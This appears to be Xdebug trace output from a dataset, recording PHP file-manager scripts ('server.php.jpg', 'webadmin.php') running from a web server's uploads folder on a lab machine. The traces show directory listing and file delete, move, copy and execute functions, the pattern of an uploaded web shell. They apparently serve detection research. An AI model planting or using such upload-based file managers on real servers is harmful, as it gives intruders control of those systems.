FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	464	1	0.024854	802800
4	464	R			6
4	465	0	0.024873	802992	sizeof	0		/var/www/html/uploads/server.php.jpg	1385	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	465	1	0.024961	803024
4	465	R			6
4	466	0	0.024979	803152	html	1		/var/www/html/uploads/server.php.jpg	1387	1	'/var/www/html/uploads/'
5	467	0	0.024997	803152	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/'	2	NULL
5	467	1	0.025018	803424
5	467	R			'/var/www/html/uploads/'
4	466	1	0.025038	803312
4	466	R			'/var/www/html/uploads/'
3		A						/var/www/html/uploads/server.php.jpg	1390	$actions = []
4	468	0	0.025077	802392	dirname	0		/var/www/html/uploads/server.php.jpg	1391	1	'/var/www/html/uploads/server.php.jpg'
4	468	1	0.025096	802488
4	468	R			'/var/www/html/uploads'
4	469	0	0.025114	802456	is_writable	0		/var/www/html/uploads/server.php.jpg	1391	1	'/var/www/html/uploads'
4	469	1	0.025137	802496
4	469	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1392	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1393	$actions[] = 'move'
3		A						/var/www/html/uploads/server.php.jpg	1395	$actions[] = 'copy'
4	470	0	0.025197	802768	str_repeat	0		/var/www/html/uploads/server.php.jpg	1398	2	'&nbsp;'	30
4	470	1	0.025216	803056
4	470	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	471	0	0.025237	802824	word	1		/var/www/html/uploads/server.php.jpg	1402	1	'delete'
5	472	0	0.025255	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	472	1	0.025274	803096
5	472	R			'delete'
4	471	1	0.025292	802984
4	471	R			'delete'
4	473	0	0.025310	802816	word	1		/var/www/html/uploads/server.php.jpg	1402	1	'move'
5	474	0	0.025327	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	474	1	0.025346	803088
5	474	R			'move'
4	473	1	0.025364	802976
4	473	R			'move'
4	475	0	0.025382	802816	word	1		/var/www/html/uploads/server.php.jpg	1402	1	'copy'
5	476	0	0.025398	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'copy'	2	'UTF-8'
5	476	1	0.025418	803088
5	476	R			'copy'
4	475	1	0.025435	802976
4	475	R			'copy'
3	203	1	0.025456	802232
3	477	0	0.025469	802232	html_footer	1		/var/www/html/uploads/server.php.jpg	1225	0
3	477	1	0.025486	802232
2	50	1	0.025497	792896
1	3	1	0.025509	792896
			0.025570	575680
TRACE END   [2023-02-12 21:04:40.704872]

data/traces/720d527f359bd8515f5cf46648ebfab4_trace-1676243916.6062.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:19:02.503999]
1	0	1	0.000195	393528
1	3	0	0.001985	789672	{main}	1		/var/www/html/uploads/webadmin.php	0	0
1		A						/var/www/html/uploads/webadmin.php	131	$lang = 'auto'
1		A						/var/www/html/uploads/webadmin.php	136	$homedir = './'
1		A						/var/www/html/uploads/webadmin.php	140	$editcols = 80
1		A						/var/www/html/uploads/webadmin.php	141	$editrows = 25
1		A						/var/www/html/uploads/webadmin.php	159	$htaccess = '.htaccess'
1		A						/var/www/html/uploads/webadmin.php	160	$htpasswd = '.htpasswd'
2	4	0	0.002069	789672	get_magic_quotes_gpc	0		/var/www/html/uploads/webadmin.php	164	0
2	4	1	0.002082	789672
2	4	R			FALSE
2	5	0	0.002097	789672	array_key_exists	0		/var/www/html/uploads/webadmin.php	170	2	'image'	[]
2	5	1	0.002112	789736
2	5	R			FALSE
2	6	0	0.002125	789672	function_exists	0		/var/www/html/uploads/webadmin.php	175	1	'lstat'
2	6	1	0.002138	789712
2	6	R			TRUE
1		A						/var/www/html/uploads/webadmin.php	181	$delim = '/'
2	7	0	0.002160	789672	function_exists	0		/var/www/html/uploads/webadmin.php	183	1	'php_uname'
2	7	1	0.002173	789712
2	7	R			TRUE
2	8	0	0.002185	789672	substr	0		/var/www/html/uploads/webadmin.php	184	3	'Linux'	0	3
2	8	1	0.002199	789800
2	8	R			'Lin'
2	9	0	0.002212	789704	strtoupper	0		/var/www/html/uploads/webadmin.php	184	1	'Lin'
2	9	1	0.002224	789768
2	9	R			'LIN'
1		A						/var/www/html/uploads/webadmin.php	184	$win = FALSE
2	10	0	0.002250	789672	dirname	0		/var/www/html/uploads/webadmin.php	192	1	'/var/www/html/uploads/webadmin.php'
2	10	1	0.002262	789768
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/webadmin.php	192	$scriptdir = '/var/www/html/uploads'
2	11	0	0.002288	789736	relative2absolute	1		/var/www/html/uploads/webadmin.php	198	2	'./'	'/var/www/html/uploads'
3	12	0	0.002301	789736	path_is_relative	1		/var/www/html/uploads/webadmin.php	1080	1	'./'
4	13	0	0.002314	789760	substr	0		/var/www/html/uploads/webadmin.php	1094	3	'./'	0	1
4	13	1	0.002328	789856
4	13	R			'.'
3	12	1	0.002341	789760
3	12	R			TRUE
3	14	0	0.002354	789760	addslash	1		/var/www/html/uploads/webadmin.php	1081	1	'/var/www/html/uploads'
4	15	0	0.002367	789784	substr	0		/var/www/html/uploads/webadmin.php	1070	3	'/var/www/html/uploads'	-1	1
4	15	1	0.002380	789880
4	15	R			's'
3	14	1	0.002395	789832
3	14	R			'/var/www/html/uploads/'
3	16	0	0.002410	789840	simplify_path	1		/var/www/html/uploads/webadmin.php	1081	1	'/var/www/html/uploads/./'
4	17	0	0.002423	789840	file_exists	0		/var/www/html/uploads/webadmin.php	1121	1	'/var/www/html/uploads/./'
4	17	1	0.002442	789880
4	17	R			TRUE
4	18	0	0.002455	789840	function_exists	0		/var/www/html/uploads/webadmin.php	1121	1	'realpath'
4	18	1	0.002468	789880
4	18	R			TRUE
4	19	0	0.002481	789840	realpath	0		/var/www/html/uploads/webadmin.php	1121	1	'/var/www/html/uploads/./'
4	19	1	0.002493	789920
4	19	R			'/var/www/html/uploads'
4	20	0	0.002508	789840	realpath	0		/var/www/html/uploads/webadmin.php	1122	1	'/var/www/html/uploads/./'
4	20	1	0.002521	789920
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/webadmin.php	1122	$path = '/var/www/html/uploads'
4	21	0	0.002545	789888	is_dir	0		/var/www/html/uploads/webadmin.php	1123	1	'/var/www/html/uploads'
4	21	1	0.002560	789952
4	21	R			TRUE
4	22	0	0.002572	789912	addslash	1		/var/www/html/uploads/webadmin.php	1124	1	'/var/www/html/uploads'
5	23	0	0.002584	789912	substr	0		/var/www/html/uploads/webadmin.php	1070	3	'/var/www/html/uploads'	-1	1
5	23	1	0.002597	790008
5	23	R			's'
4	22	1	0.002610	789960
4	22	R			'/var/www/html/uploads/'
3	16	1	0.002624	789912
3	16	R			'/var/www/html/uploads/'
2	11	1	0.002638	789856
2	11	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/webadmin.php	198	$homedir = '/var/www/html/uploads/'
2	24	0	0.002661	789856	array_key_exists	0		/var/www/html/uploads/webadmin.php	200	2	'dir'	[]
2	24	1	0.002675	789920
2	24	R			FALSE
1		A						/var/www/html/uploads/webadmin.php	200	$dir = '/var/www/html/uploads/'
2	25	0	0.002698	789856	array_key_exists	0		/var/www/html/uploads/webadmin.php	202	2	'olddir'	[]
2	25	1	0.002712	789920
2	25	R			FALSE
2	26	0	0.002729	789856	addslash	1		/var/www/html/uploads/webadmin.php	206	1	'/var/www/html/uploads/'
3	27	0	0.002742	789856	substr	0		/var/www/html/uploads/webadmin.php	1070	3	'/var/www/html/uploads/'	-1	1
3	27	1	0.002755	789952
3	27	R			'/'
2	26	1	0.002768	789856
2	26	R			'/var/www/html/uploads/'
2	28	0	0.002781	789856	simplify_path	1		/var/www/html/uploads/webadmin.php	206	1	'/var/www/html/uploads/'
3	29	0	0.002794	789856	file_exists	0		/var/www/html/uploads/webadmin.php	1121	1	'/var/www/html/uploads/'
3	29	1	0.002809	789896
3	29	R			TRUE
3	30	0	0.002822	789856	function_exists	0		/var/www/html/uploads/webadmin.php	1121	1	'realpath'
3	30	1	0.002835	789896
3	30	R			TRUE
3	31	0	0.002847	789856	realpath	0		/var/www/html/uploads/webadmin.php	1121	1	'/var/www/html/uploads/'
3	31	1	0.002860	789936
3	31	R			'/var/www/html/uploads'
3	32	0	0.002874	789856	realpath	0		/var/www/html/uploads/webadmin.php	1122	1	'/var/www/html/uploads/'
3	32	1	0.002886	789936
3	32	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/webadmin.php	1122	$path = '/var/www/html/uploads'
3	33	0	0.002909	789904	is_dir	0		/var/www/html/uploads/webadmin.php	1123	1	'/var/www/html/uploads'
3	33	1	0.002922	789944
3	33	R			TRUE
3	34	0	0.002934	789904	addslash	1		/var/www/html/uploads/webadmin.php	1124	1	'/var/www/html/uploads'
4	35	0	0.002946	789904	substr	0		/var/www/html/uploads/webadmin.php	1070	3	'/var/www/html/uploads'	-1	1
4	35	1	0.002959	790000
4	35	R			's'
3	34	1	0.002972	789952
3	34	R			'/var/www/html/uploads/'
2	28	1	0.002986	789904
2	28	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/webadmin.php	206	$directory = '/var/www/html/uploads/'
1		A						/var/www/html/uploads/webadmin.php	208	$files = []
1		A						/var/www/html/uploads/webadmin.php	209	$action = ''
2	36	0	0.003039	789904	array_key_exists	0		/var/www/html/uploads/webadmin.php	223	2	'num'	[]
2	36	1	0.003053	789968
2	36	R			FALSE
2	37	0	0.003066	789904	array_key_exists	0		/var/www/html/uploads/webadmin.php	232	2	'focus'	[]
2	37	1	0.003079	789968
2	37	R			FALSE
2	38	0	0.003092	789904	sizeof	0		/var/www/html/uploads/webadmin.php	242	1	[]
2	38	1	0.003105	789936
2	38	R			0
1		A						/var/www/html/uploads/webadmin.php	242	$action = ''
2	39	0	0.003127	789904	array_key_exists	0		/var/www/html/uploads/webadmin.php	245	2	'HTTP_ACCEPT_LANGUAGE'	['HTTP_HOST' => 'localhost', 'HTTP_USER_AGENT' => 'python-requests/2.25.1', 'HTTP_ACCEPT_ENCODING' => 'gzip, deflate', 'HTTP_ACCEPT' => '*/*', 'HTTP_CONNECTION' => 'keep-alive', 'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin', 'SERVER_SIGNATURE' => '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n', 'SERVER_SOFTWARE' => 'Apache/2.4.52 (Ubuntu)', 'SERVER_NAME' => 'localhost', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'REMOTE_ADDR' => '127.0.0.1', 'DOCUMENT_ROOT' => '/var/www/html', 'REQUEST_SCHEME' => 'http', 'CONTEXT_PREFIX' => '', 'CONTEXT_DOCUMENT_ROOT' => '/var/www/html', 'SERVER_ADMIN' => 'webmaster@localhost', 'SCRIPT_FILENAME' => '/var/www/html/uploads/webadmin.php', 'REMOTE_PORT' => '42044', 'GATEWAY_INTERFACE' => 'CGI/1.1', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'REQUEST_METHOD' => 'GET', 'QUERY_STRING' => '', 'REQUEST_URI' => '/uploads/webadmin.php', 'SCRIPT_NAME' => '/uploads/webadmin.php', 'PHP_SELF' => '/uploads/webadmin.php', 'REQUEST_TIME_FLOAT' => 1676243916.605, 'REQUEST_TIME' => 1676243916]
2	39	1	0.003180	789968
2	39	R			FALSE
1		A						/var/www/html/uploads/webadmin.php	248	$lang = 'en'
2	40	0	0.003203	789904	getwords	1		/var/www/html/uploads/webadmin.php	252	1	'en'
2		A						/var/www/html/uploads/webadmin.php	1620	$word_charset = 'UTF-8'
2		A						/var/www/html/uploads/webadmin.php	2472	$date_format = 'n/j/y H:i:s'
2	40	1	0.003239	789952
2	40	R			['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/webadmin.php	252	$words = ['directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => 'These files have been deleted:\n[%1]', 'not_deleted' => 'These files could not be deleted:\n[%1]', 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => 'These files have been moved to "[%2]":\n[%1]', 'not_moved' => 'These files could not be moved to "[%2]":\n[%1]', 'copy_files' => 'Copy these files:', 'copied' => 'These files have been copied to "[%2]":\n[%1]', 'not_copied' => 'These files could not be copied to "[%2]":\n[%1]', 'not_edited' => '"[%1]" can not be edited.', 'executed' => '"[%1]" has been executed successfully:\n{%2}', 'not_executed' => '"[%1]" could not be executed successfully:\n{%2}', 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.']
1		A						/var/www/html/uploads/webadmin.php	258	$cols = 7
2	41	0	0.003434	789952	function_exists	0		/var/www/html/uploads/webadmin.php	261	1	'umask'
2	41	1	0.003448	789992
2	41	R			TRUE
2	42	0	0.003461	789952	umask	0		/var/www/html/uploads/webadmin.php	261	0
2	42	1	0.003474	789952
2	42	R			18
1		A						/var/www/html/uploads/webadmin.php	261	$dirpermission = 493
2	43	0	0.003497	789952	function_exists	0		/var/www/html/uploads/webadmin.php	264	1	'umask'
2	43	1	0.003510	789992
2	43	R			TRUE
2	44	0	0.003523	789952	umask	0		/var/www/html/uploads/webadmin.php	264	0
2	44	1	0.003534	789952
2	44	R			18
1		A						/var/www/html/uploads/webadmin.php	264	$filepermission = 420
2	45	0	0.003558	789952	basename	0		/var/www/html/uploads/webadmin.php	268	1	'/uploads/webadmin.php'
2	45	1	0.003573	790024
2	45	R			'webadmin.php'
2	46	0	0.003586	789992	html	1		/var/www/html/uploads/webadmin.php	268	1	'webadmin.php'
3	47	0	0.003599	790016	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'webadmin.php'	2	NULL
3	47	1	0.003615	790288
3	47	R			'webadmin.php'
2	46	1	0.003629	790176
2	46	R			'webadmin.php'
1		A						/var/www/html/uploads/webadmin.php	268	$self = 'webadmin.php'
2	48	0	0.003653	790136	substr	0		/var/www/html/uploads/webadmin.php	276	3	'Apache/2.4.52 (Ubuntu)'	0	6
2	48	1	0.003667	790264
2	48	R			'Apache'
2	49	0	0.003680	790168	strtolower	0		/var/www/html/uploads/webadmin.php	276	1	'Apache'
2	49	1	0.003693	790232
2	49	R			'apache'
1		A						/var/www/html/uploads/webadmin.php	277	$apache = TRUE
2	50	0	0.003717	790136	listing_page	1		/var/www/html/uploads/webadmin.php	842	1	???
3	51	0	0.003730	790232	html_header	1		/var/www/html/uploads/webadmin.php	1184	0
3	51	1	0.003744	790232
3	52	0	0.003751	790232	getlist	1		/var/www/html/uploads/webadmin.php	1186	1	'/var/www/html/uploads/'
4	53	0	0.003764	790232	opendir	0		/var/www/html/uploads/webadmin.php	851	1	'/var/www/html/uploads/'
4	53	1	0.003783	790624
4	53	R			resource(4) of type (stream)
3		A						/var/www/html/uploads/webadmin.php	851	$d = resource(4) of type (stream)
4	54	0	0.003810	790592	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	54	1	0.003831	790672
4	54	R			'webadmin.php'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = 'webadmin.php'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/webadmin.php'
4	55	0	0.003866	790696	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/webadmin.php'
4	55	1	0.003883	792528
4	55	R			[0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 152]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524475, 2 => 33204, 3 => 1, 4 => 1000, 5 => 1000, 6 => 0, 7 => 77659, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 152, 'dev' => 2049, 'ino' => 524475, 'mode' => 33204, 'nlink' => 1, 'uid' => 1000, 'gid' => 1000, 'rdev' => 0, 'size' => 77659, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 152]
4	56	0	0.003965	793184	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/webadmin.php'
4	56	1	0.003981	793240
4	56	R			TRUE
4	57	0	0.003994	793200	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/webadmin.php'
4	57	1	0.004007	793240
4	57	R			FALSE
4	58	0	0.004020	793200	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/webadmin.php'
4	58	1	0.004033	793240
4	58	R			FALSE
4	59	0	0.004046	793200	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/webadmin.php'
4	59	1	0.004061	793240
4	59	R			TRUE
4	60	0	0.004074	793200	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/webadmin.php'
4	60	1	0.004089	793240
4	60	R			FALSE
4	61	0	0.004103	793200	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/webadmin.php'
4	61	1	0.004120	793240
4	61	R			1676243916
4	62	0	0.004133	793200	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/webadmin.php'
4	62	1	0.004145	793240
4	62	R			1676243916
4	63	0	0.004158	793200	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/webadmin.php'
4	63	1	0.004170	793240
4	63	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	64	0	0.004209	793200	is_executable	0		/var/www/html/uploads/webadmin.php	880	1	'/var/www/html/uploads/webadmin.php'
4	64	1	0.004225	793240
4	64	R			FALSE
3		A						/var/www/html/uploads/webadmin.php	880	$file['is_executable'] = FALSE
4	65	0	0.004250	793200	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	65	1	0.004264	793240
4	65	R			TRUE
4	66	0	0.004276	793200	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	1000
4	66	1	0.004313	794016
4	66	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	67	0	0.004347	793984	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	67	1	0.004368	794392
4	67	R			'osboxes'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'osboxes'
4	68	0	0.004394	793232	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	68	1	0.004407	793272
4	68	R			TRUE
4	69	0	0.004420	793232	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	1000
4	69	1	0.004455	793888
4	69	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	70	0	0.004475	793856	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	70	1	0.004491	794264
4	70	R			'osboxes'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'osboxes'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	71	0	0.004545	794280	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	71	1	0.004560	794352
4	71	R			'..'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = '..'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/..'
4	72	0	0.004594	794368	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/..'
4	72	1	0.004611	796152
4	72	R			[0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524470, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524470, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
4	73	0	0.004671	795056	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/..'
4	73	1	0.004686	795088
4	73	R			FALSE
4	74	0	0.004699	795048	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/..'
4	74	1	0.004712	795088
4	74	R			TRUE
4	75	0	0.004724	795048	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/..'
4	75	1	0.004737	795088
4	75	R			FALSE
4	76	0	0.004749	795048	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/..'
4	76	1	0.004764	795088
4	76	R			TRUE
4	77	0	0.004776	795048	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/..'
4	77	1	0.004791	795088
4	77	R			TRUE
4	78	0	0.004803	795048	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/..'
4	78	1	0.004816	795088
4	78	R			1676243916
